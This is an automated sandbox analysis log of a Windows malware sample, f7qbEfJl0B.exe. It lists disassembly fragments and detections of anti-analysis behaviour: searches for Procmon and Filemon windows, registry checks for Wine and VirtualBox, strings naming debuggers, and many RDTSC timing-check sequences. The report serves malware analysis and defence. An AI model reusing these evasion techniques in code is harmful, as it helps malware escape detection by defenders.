Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077A056 pushfd ; retf 0001h0_3_0077A057
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077A056 pushfd ; retf 0001h0_3_0077A057
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00789250 push eax; retf 003Bh0_3_00789444
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00789250 push eax; retf 003Bh0_3_00789444
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00778827 push ebp; retf 0_3_00778828
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077C314 push 700076A4h; ret 0_3_0077C319
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077C314 push 700076A4h; ret 0_3_0077C319
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077A056 pushfd ; retf 0001h0_3_0077A057
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077A056 pushfd ; retf 0001h0_3_0077A057
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00789250 push eax; retf 003Bh0_3_00789444
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00789250 push eax; retf 003Bh0_3_00789444
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00778827 push ebp; retf 0_3_00778828
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077C314 push 700076A4h; ret 0_3_0077C319
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077C314 push 700076A4h; ret 0_3_0077C319
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: f7qbEfJl0B.exeStatic PE information: section name: lrpylste entropy: 7.95488352075432

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F0CC0 second address: 17F0CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F0CC6 second address: 17F0CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17D94CB second address: 17D94D7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7B216C3176h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17D94D7 second address: 17D94DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17D94DD second address: 17D9503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F7B216C3176h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17D9503 second address: 17D9509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17EFC86 second address: 17EFC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17EFE33 second address: 17EFE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17EFE37 second address: 17EFE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C3182h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F7B216C3176h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F057F second address: 17F05C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D0h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F7B212E85D8h 0x00000012 jnc 00007F7B212E85CEh 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F05C2 second address: 17F05D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7B216C3176h 0x0000000a jnc 00007F7B216C3176h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F38EA second address: 17F38EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F38EE second address: 17F38FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C317Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F38FD second address: 17F393D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 208E9D72h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F7B212E85C8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+12B456D8h] 0x0000002f or ecx, dword ptr [ebp+129C383Fh] 0x00000035 push eax 0x00000036 push eax 0x00000037 pushad 0x00000038 push edi 0x00000039 pop edi 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3980 second address: 17F39A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B216C3189h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F39A5 second address: 17F39AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F39AB second address: 17F39EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7B216C3184h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov cx, si 0x0000000f push 00000000h 0x00000011 jns 00007F7B216C317Ch 0x00000017 mov dword ptr [ebp+129C1CEFh], ebx 0x0000001d call 00007F7B216C3179h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jnl 00007F7B216C3176h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F39EC second address: 17F39F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F39F1 second address: 17F3A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F7B216C3187h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 jc 00007F7B216C317Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3A1D second address: 17F3A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3A2A second address: 17F3A4F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C3178h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7B216C3182h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3A4F second address: 17F3A7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 mov ch, dh 0x0000000a push 00000003h 0x0000000c mov edx, dword ptr [ebp+129C3873h] 0x00000012 push 00000000h 0x00000014 push 00000003h 0x00000016 sub dword ptr [ebp+129C2AF8h], ebx 0x0000001c call 00007F7B212E85C9h 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007F7B212E85C8h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3A7E second address: 17F3ACE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7B216C3187h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 ja 00007F7B216C3188h 0x00000019 jmp 00007F7B216C3182h 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F7B216C3178h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3ACE second address: 17F3B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B212E85D8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7B212E85D7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3B0C second address: 17F3B1A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3B1A second address: 17F3B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17F3B1E second address: 17F3B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 add eax, 77E18A88h 0x0000000f popad 0x00000010 lea ebx, dword ptr [ebp+12B456E1h] 0x00000016 mov edi, dword ptr [ebp+129C295Dh] 0x0000001c xchg eax, ebx 0x0000001d jl 00007F7B216C3184h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18118DA second address: 18118F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7B212E85CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18118F1 second address: 18118F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811A6C second address: 1811A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B212E85D5h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811A8D second address: 1811A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811D83 second address: 1811D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811D87 second address: 1811D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811D8B second address: 1811D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811D93 second address: 1811D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811D99 second address: 1811D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811D9D second address: 1811DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1811DA1 second address: 1811DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F7B212E85D7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1812069 second address: 1812093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7B216C3176h 0x0000000a popad 0x0000000b jg 00007F7B216C317Ch 0x00000011 pushad 0x00000012 push edx 0x00000013 jmp 00007F7B216C317Ch 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1812310 second address: 181231A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B212E85C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181231A second address: 1812324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1812324 second address: 1812328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1812328 second address: 181233F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181249B second address: 18124A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18124A1 second address: 18124A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 180AC47 second address: 180AC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1812EDE second address: 1812EF2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7B216C3176h 0x00000008 jmp 00007F7B216C317Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1813062 second address: 1813068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1813068 second address: 1813085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7B216C3182h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1813085 second address: 181308B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18135FC second address: 1813600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1813600 second address: 181361C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181361C second address: 1813628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7B216C3176h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1813628 second address: 181362C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1815A4B second address: 1815A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1815A4F second address: 1815A5A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1815A5A second address: 1815A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1816F65 second address: 1816F71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7B212E85CEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17EBA9E second address: 17EBAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17EBAA2 second address: 17EBAB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F7B212E85CCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181BB33 second address: 181BB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181BB37 second address: 181BB4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181BB4E second address: 181BB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181AAE1 second address: 181AAE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181BD94 second address: 181BDAD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7B216C317Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181BDAD second address: 181BDCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7B212E85C8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F7B212E85CCh 0x00000019 jns 00007F7B212E85C6h 0x0000001f rdtsc
